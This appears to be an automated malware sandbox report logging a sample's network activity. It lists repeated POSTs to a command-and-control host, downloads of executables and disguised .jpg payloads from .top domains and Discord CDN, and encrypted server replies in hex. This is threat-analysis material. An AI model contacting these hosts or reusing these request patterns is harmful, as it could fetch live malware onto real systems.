Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cuuhert.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpmovtar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csbokajdc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adqaqqqe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjcvackirk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lylgknghko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wexymhl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glqydpsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqbwtkcju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdonp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfxrwj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxvawpr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctbemocusw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wofjmrw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdcmurwfts.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drroxf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqvvicnwkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmylopjj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvxvmaqhni.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhlsdp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vexln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukjpg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oahqstcrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sowcs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhtqeo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wepobp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uriot.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isqhctlhh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbejr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufipchi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlotoun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: hajezey1.top
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49842 -> 93.115.20.139:28978
Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97/
Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97/.top&)
Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmp, 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861
Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861(
Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp String found in binary or memory: http://91.svchost.exe
Source: 77DC.exe String found in binary or memory: http://fontello.com
Source: 152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/
Source: 152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/O
Source: A557.exe, A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: A557.exe String found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: A557.exe, A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: 77DC.exe String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg
Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmp String found in binary or memory: https://telegram.org/img/t_logo.png
Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmp String found in binary or memory: https://toptelete.top/agrybirdsgamerept
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_004070B4 HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 34_2_004070B4
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
